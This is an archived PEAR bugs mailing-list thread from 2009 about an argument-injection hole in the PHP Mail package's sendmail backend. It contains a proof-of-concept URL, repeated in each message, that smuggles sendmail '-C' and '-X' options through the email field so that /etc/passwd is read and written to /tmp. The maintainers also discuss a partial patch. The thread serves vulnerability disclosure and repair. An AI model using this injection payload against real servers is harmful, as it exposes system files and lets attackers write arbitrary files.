FAQ
Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1

ID: 16200
Updated by: daniel.oconnor@gmail.com
Reported By: root at 80sec dot com
Summary: security hole allow to read/write Arbitrary File
Status: Open
Type: Bug
Package: Mail
Operating System: linux
Package Version: 1.1.14
PHP Version: 5.2.5
Roadmap Versions:
New Comment:

Looks like this is safe on windows.


Previous Comments:
------------------------------------------------------------------------

[2009-05-07 11:16:17] websec

Description:
------------
The mail package used escapeshellcmd function Incorrectly,so it may
allow to read/write Arbitrary File

Test script:
---------------
<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');

require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me";
$hdrs = array(
"To" => $to,
"Cc" => $cc,
"Bcc" => $bcc,
"From" => $from,
"Subject" => $subject,
);
$body="test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

Expected result:
----------------
this may read /etc/passwd and write it to /tmp/wokao

Actual result:
--------------
this may read /etc/passwd and write it to /tmp/wokao

------------------------------------------------------------------------

Search Discussions

  • Daniel Oconnor at May 8, 2009 at 3:20 am
    Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1

    ID: 16200
    Updated by: daniel.oconnor@gmail.com
    Reported By: root at 80sec dot com
    Summary: security hole allow to read/write Arbitrary File
    -Status: Open
    +Status: Critical
    Type: Bug
    Package: Mail
    Operating System: linux
    Package Version: 1.1.14
    PHP Version: 5.2.5
    Roadmap Versions:
    New Comment:

    -Status: Open
    +Status: Critical

    Bumping to critical for the moment.


    Previous Comments:
    ------------------------------------------------------------------------

    [2009-05-08 05:19:14] doconnor

    Looks like this is safe on windows.

    ------------------------------------------------------------------------

    [2009-05-07 11:16:17] websec

    Description:
    ------------
    The mail package used escapeshellcmd function Incorrectly,so it may
    allow to read/write Arbitrary File

    Test script:
    ---------------
    <?php
    ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');

    require_once("Mail.php");
    $from = "From: " . $_REQUEST['email'] . "\r\n";
    $to = "xxxxxxx@zzzz.com";
    $subj = "subscription request";
    $body = "subscribe me";
    $hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subject,
    );
    $body="test";
    $mail =& Mail::factory('sendmail');
    $mail->send($to, $hdrs, $body);
    ?>

    test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

    Expected result:
    ----------------
    this may read /etc/passwd and write it to /tmp/wokao

    Actual result:
    --------------
    this may read /etc/passwd and write it to /tmp/wokao

    ------------------------------------------------------------------------
  • Daniel Oconnor at May 8, 2009 at 3:38 am
    Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1

    ID: 16200
    Updated by: daniel.oconnor@gmail.com
    Reported By: root at 80sec dot com
    Summary: security hole allow to read/write Arbitrary File
    Status: Critical
    Type: Bug
    Package: Mail
    Operating System: linux
    Package Version: 1.1.14
    PHP Version: 5.2.5
    Roadmap Versions:
    New Comment:

    Above patch adds in Validate and validates the from address is a valid
    email.

    This may not be correct behaviour.
    This may also still be exploitable by targetting different arguments.


    Previous Comments:
    ------------------------------------------------------------------------

    [2009-05-08 05:36:52] doconnor

    The following patch has been added/updated:

    Patch Name: quick-fix
    Revision: 1241757412
    URL:
    http://pear.php.net/bugs/patch-display.php?bug=16200&patch=quick-fix&revision=1241757412&display=1

    ------------------------------------------------------------------------

    [2009-05-08 05:20:20] doconnor

    -Status: Open
    +Status: Critical

    Bumping to critical for the moment.

    ------------------------------------------------------------------------

    [2009-05-08 05:19:14] doconnor

    Looks like this is safe on windows.

    ------------------------------------------------------------------------

    [2009-05-07 11:16:17] websec

    Description:
    ------------
    The mail package used escapeshellcmd function Incorrectly,so it may
    allow to read/write Arbitrary File

    Test script:
    ---------------
    <?php
    ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');

    require_once("Mail.php");
    $from = "From: " . $_REQUEST['email'] . "\r\n";
    $to = "xxxxxxx@zzzz.com";
    $subj = "subscription request";
    $body = "subscribe me";
    $hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subject,
    );
    $body="test";
    $mail =& Mail::factory('sendmail');
    $mail->send($to, $hdrs, $body);
    ?>

    test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

    Expected result:
    ----------------
    this may read /etc/passwd and write it to /tmp/wokao

    Actual result:
    --------------
    this may read /etc/passwd and write it to /tmp/wokao

    ------------------------------------------------------------------------

Related Discussions

Discussion Navigation
viewthread | post
Discussion Overview
grouppear-bugs @
categoriesphp
postedMay 8, '09 at 3:19a
activeMay 8, '09 at 3:38a
posts3
users1
websitepear.php.net

1 user in discussion

Daniel Oconnor: 3 posts

People

Translate

site design / logo © 2022 Grokbase